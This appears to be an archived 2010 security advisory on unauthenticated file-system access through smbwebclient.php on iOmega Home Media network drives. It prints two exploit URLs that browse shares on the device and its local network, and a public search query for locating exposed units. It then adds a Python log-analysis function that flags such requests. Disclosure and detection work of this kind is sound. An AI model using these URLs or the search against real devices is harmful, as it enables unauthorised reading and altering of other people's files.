iOmega Home Media Network Drive Arbitrary Access

Posted Apr 15, 2010
Authored by fizix610

iOmega Home Media Network Hard Drive firmware versions 2.038 through 2.061 suffer from an unauthenticated access vulnerability.

tags | exploit
SHA-256 | 2cd1de52837d1fdcc72f8f653ffe102295eda8e88b928a3da31fdfe6dfcfb58f

-----------------------------
Advisory
-----------------------------
Unauthenticated File-system Access in iomega Home Media Network Hard Drive

-----------------------------
Affected products
-----------------------------
iomega Home Media Network Hard Drive Firmware versions 2.038 - 2.061

-----------------------------
Timeline
-----------------------------
04.13.2010 - Discovered, disclosed to Bugtraq.

-----------------------------
Disclosure
-----------------------------
Full. Not disclosed to vendor due to latest firmware not being vulnerable.

-----------------------------
Details
-----------------------------
iomega chose to use smbwebclient to allow users of its product to access files shared by the device via their web browser. However, smbwebclient sits in an unprotected directory, so it can be reached without authentication. smbwebclient grants the user full browser-based read/write access to any visible shares on the device itself OR on the rest of the device's local network (assuming the shares' permissions grant said access).

-----------------------------
Exploit
-----------------------------
View shares on device:
http://[DEVICE IP OR HOSTNAME]/cgi-bin/smbwebclient.php?path=WORKGROUP%2F[DEVICE NAME]
(Device name is found in title of webpage on root directory of device)

View all shares on device's local network:
http://[DEVICE IP OR HOSTNAME]/cgi-bin/smbwebclient.php

-----------------------------
Detection
-----------------------------
51 results returned in the following search on ERIPP:
http://eripp.com/?ipdb=1&search="Iomega"&sort=time&order=DESC&limit=20&submitbutton=Search

If the device displays a slideshow on its root (home) page, it is generally running firmware version 2.063 and is not vulnerable.
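
Added example (not part of the original advisory): a log check that flags unauthenticated, successful requests to the smbwebclient.php path named under Exploit and decodes which share was browsed. It assumes a combined-format access log is available from the device or from a proxy in front of it; the function name, LAN subnet, device name and sample lines are constructed for illustration.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Combined log format is an assumption; the advisory does not describe device logging.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ (?P<user>\S+) \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
ENDPOINT = "/cgi-bin/smbwebclient.php"  # path given in the advisory


def find_smbwebclient_hits(lines, device_name, lan):
    """Return one finding per successful request made with no authenticated user."""
    lan_net = ipaddress.ip_network(lan)
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        # Keep only 2xx responses to the endpoint where the auth-user field is "-".
        if (url.path.lower() != ENDPOINT or m["user"] != "-"
                or not m["status"].startswith("2")):
            continue
        # parse_qs percent-decodes, so WORKGROUP%2FNAS becomes WORKGROUP/NAS.
        smb_path = parse_qs(url.query).get("path", [""])[0]
        parts = [p for p in smb_path.split("/") if p]
        host = parts[1] if len(parts) > 1 else None
        findings.append({
            "client": m["ip"],
            "external": ipaddress.ip_address(m["ip"]) not in lan_net,
            "smb_path": smb_path or "(network root)",
            # No host, or a host other than the device: browsing went beyond the NAS.
            "beyond_device": host is None or host.lower() != device_name.lower(),
        })
    return findings


# Constructed sample lines (documentation-range and private addresses, made-up names).
SAMPLE = [
    '203.0.113.9 - - [15/Apr/2010:10:01:02 +0000] "GET /cgi-bin/smbwebclient.php HTTP/1.1" 200 5120',
    '203.0.113.9 - - [15/Apr/2010:10:01:09 +0000] "GET /cgi-bin/smbwebclient.php?path=WORKGROUP%2FDESKTOP-PC%2Fdocs HTTP/1.1" 200 2048',
    '192.168.1.20 - - [15/Apr/2010:10:02:00 +0000] "GET /cgi-bin/smbwebclient.php?path=WORKGROUP%2FNAS HTTP/1.1" 200 1024',
    '192.168.1.20 - alice [15/Apr/2010:10:03:00 +0000] "GET /index.html HTTP/1.1" 200 300',
    '198.51.100.4 - - [15/Apr/2010:10:04:00 +0000] "GET /cgi-bin/smbwebclient.php HTTP/1.1" 404 210',
]

if __name__ == "__main__":
    for finding in find_smbwebclient_hits(SAMPLE, "NAS", "192.168.1.0/24"):
        print(finding)
```

Findings with external set are the ones to triage first; beyond_device marks requests that listed or opened shares on hosts other than the NAS.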

-----------------------------
References
-----------------------------
http://go.iomega.com/en-us/products/network-storage-desktop/home-network-hard-drives/home-media/?partner=4760
http://smbwebclient.sourceforge.net/2005/02/version-22.html
http://eripp.com/